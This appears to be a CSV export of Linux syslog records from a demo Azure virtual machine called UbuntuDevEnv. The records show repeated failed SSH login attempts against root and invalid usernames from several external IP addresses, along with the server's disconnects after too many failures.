+14161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:19,UbuntuDevEnv,2019-06-26 04:54:18,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 56195 ssh2],2627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56195,,
+14162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:22,UbuntuDevEnv,2019-06-26 04:54:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:23,UbuntuDevEnv,2019-06-26 04:54:23,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 61880 ssh2,2705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61880,,
+14164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:27,UbuntuDevEnv,2019-06-26 04:54:26,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 61880 ssh2,2705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61880,,
+14165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:27,UbuntuDevEnv,2019-06-26 04:54:26,auth,UbuntuDevEnv,info,Invalid user jeremy from 5.135.161.72 port 51958,2724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jeremy,5.135.161.7,51958,,
+14166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:27,UbuntuDevEnv,2019-06-26 04:54:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,2724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+14167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:27,UbuntuDevEnv,2019-06-26 04:54:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:29,UbuntuDevEnv,2019-06-26 04:54:29,auth,UbuntuDevEnv,info,Failed password for invalid user jeremy from 5.135.161.72 port 51958 ssh2,2724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jeremy,5.135.161.7,51958,,
+14169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:29,UbuntuDevEnv,2019-06-26 04:54:29,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 51958:11: Bye Bye [preauth],2724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,51958,,
+14170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:29,UbuntuDevEnv,2019-06-26 04:54:29,auth,UbuntuDevEnv,info,Disconnected from invalid user jeremy 5.135.161.72 port 51958 [preauth],2724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jeremy,5.135.161.7,51958,,
+14171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:30,UbuntuDevEnv,2019-06-26 04:54:29,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 61880 ssh2,2705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61880,,
+14172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:33,UbuntuDevEnv,2019-06-26 04:54:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:33,UbuntuDevEnv,2019-06-26 04:54:32,auth,UbuntuDevEnv,info,Invalid user fedora from 95.216.195.95 port 46592,2746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fedora,95.216.195.9,46592,,
+14174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:33,UbuntuDevEnv,2019-06-26 04:54:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,2746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+14175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:33,UbuntuDevEnv,2019-06-26 04:54:33,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 61880 ssh2,2705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61880,,
+14176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:34,UbuntuDevEnv,2019-06-26 04:54:34,auth,UbuntuDevEnv,info,Failed password for invalid user fedora from 95.216.195.95 port 46592 ssh2,2746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fedora,95.216.195.9,46592,,
+14177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:34,UbuntuDevEnv,2019-06-26 04:54:34,auth,UbuntuDevEnv,info,Disconnected from invalid user fedora 95.216.195.95 port 46592 [preauth],2746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fedora,95.216.195.9,46592,,
+14178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:34,UbuntuDevEnv,2019-06-26 04:54:34,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 46592:11: Bye Bye [preauth],2746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,46592,,
+14179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:36,UbuntuDevEnv,2019-06-26 04:54:35,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 61880 ssh2,2705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61880,,
+14180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:39,UbuntuDevEnv,2019-06-26 04:54:38,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 61880: Too many authentication failures [preauth],2705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,61880,,
+14181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:39,UbuntuDevEnv,2019-06-26 04:54:38,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,2705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:39,UbuntuDevEnv,2019-06-26 04:54:38,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 61880 ssh2 [preauth],2705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61880,,
+14183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:39,UbuntuDevEnv,2019-06-26 04:54:38,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:39,UbuntuDevEnv,2019-06-26 04:54:38,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 61880 ssh2,2705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,61880,,
+14185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:41,UbuntuDevEnv,2019-06-26 04:54:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:44,UbuntuDevEnv,2019-06-26 04:54:44,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 3107 ssh2,2773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3107,,
+14187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:46,UbuntuDevEnv,2019-06-26 04:54:46,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 3107 ssh2,2773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3107,,
+14188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:50,UbuntuDevEnv,2019-06-26 04:54:50,auth,UbuntuDevEnv,info,Invalid user virus from 196.41.208.238 port 33064,2807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,virus,196.41.208.2,33064,,
+14189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:50,UbuntuDevEnv,2019-06-26 04:54:49,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 3107 ssh2,2773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3107,,
+14190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:50,UbuntuDevEnv,2019-06-26 04:54:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,2807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+14191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:50,UbuntuDevEnv,2019-06-26 04:54:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:52,UbuntuDevEnv,2019-06-26 04:54:52,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 3107 ssh2,2773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3107,,
+14193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:53,UbuntuDevEnv,2019-06-26 04:54:52,auth,UbuntuDevEnv,info,Failed password for invalid user virus from 196.41.208.238 port 33064 ssh2,2807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,virus,196.41.208.2,33064,,
+14194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:53,UbuntuDevEnv,2019-06-26 04:54:52,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 33064:11: Bye Bye [preauth],2807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,33064,,
+14195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:53,UbuntuDevEnv,2019-06-26 04:54:52,auth,UbuntuDevEnv,info,Disconnected from invalid user virus 196.41.208.238 port 33064 [preauth],2807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,virus,196.41.208.2,33064,,
+14196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:55,UbuntuDevEnv,2019-06-26 04:54:55,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 3107 ssh2,2773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3107,,
+14197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:58,UbuntuDevEnv,2019-06-26 04:54:57,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,2773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:58,UbuntuDevEnv,2019-06-26 04:54:57,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:58,UbuntuDevEnv,2019-06-26 04:54:57,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 3107 ssh2 [preauth],2773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3107,,
+14200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:58,UbuntuDevEnv,2019-06-26 04:54:57,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 3107 ssh2,2773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3107,,
+14201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:58,UbuntuDevEnv,2019-06-26 04:54:57,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 3107: Too many authentication failures [preauth],2773,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,3107,,
+14202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:59,UbuntuDevEnv,2019-06-26 04:54:58,auth,UbuntuDevEnv,info,Invalid user doku from 200.6.188.38 port 54639,2843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,doku,200.6.188.3,54639,,
+14203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:59,UbuntuDevEnv,2019-06-26 04:54:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:54:59,UbuntuDevEnv,2019-06-26 04:54:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,2843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+14205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:00,UbuntuDevEnv,2019-06-26 04:55:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:01,UbuntuDevEnv,2019-06-26 04:55:00,auth,UbuntuDevEnv,info,Failed password for invalid user doku from 200.6.188.38 port 54639 ssh2,2843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,doku,200.6.188.3,54639,,
+14207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:01,UbuntuDevEnv,2019-06-26 04:55:01,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 54639:11: Bye Bye [preauth],2843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,54639,,
+14208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:01,UbuntuDevEnv,2019-06-26 04:55:01,auth,UbuntuDevEnv,info,Disconnected from invalid user doku 200.6.188.38 port 54639 [preauth],2843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,doku,200.6.188.3,54639,,
+14209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:01,UbuntuDevEnv,2019-06-26 04:55:01,auth,UbuntuDevEnv,info,Invalid user zhuan from 177.23.90.10 port 38426,2842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhuan,177.23.90.1,38426,,
+14210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:01,UbuntuDevEnv,2019-06-26 04:55:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:01,UbuntuDevEnv,2019-06-26 04:55:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,2842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+14212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:03,UbuntuDevEnv,2019-06-26 04:55:03,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 8723 ssh2,2849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,8723,,
+14213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:04,UbuntuDevEnv,2019-06-26 04:55:03,auth,UbuntuDevEnv,info,Connection closed by 119.123.240.8 port 47521 [preauth],2841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,47521,,
+14214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:04,UbuntuDevEnv,2019-06-26 04:55:04,auth,UbuntuDevEnv,info,Failed password for invalid user zhuan from 177.23.90.10 port 38426 ssh2,2842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhuan,177.23.90.1,38426,,
+14215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:04,UbuntuDevEnv,2019-06-26 04:55:04,auth,UbuntuDevEnv,info,Disconnected from invalid user zhuan 177.23.90.10 port 38426 [preauth],2842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhuan,177.23.90.1,38426,,
+14216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:04,UbuntuDevEnv,2019-06-26 04:55:04,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 38426:11: Bye Bye [preauth],2842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,38426,,
+14217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:06,UbuntuDevEnv,2019-06-26 04:55:06,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 8723 ssh2,2849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,8723,,
+14218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:18,UbuntuDevEnv,2019-06-26 04:55:18,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 8723 ssh2 [preauth],2849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,8723,,
+14219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:18,UbuntuDevEnv,2019-06-26 04:55:18,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 8723 ssh2],2849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,8723,,
+14220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:55:18,UbuntuDevEnv,2019-06-26 04:55:18,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 8723: Too many authentication failures [preauth],2849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,8723,,
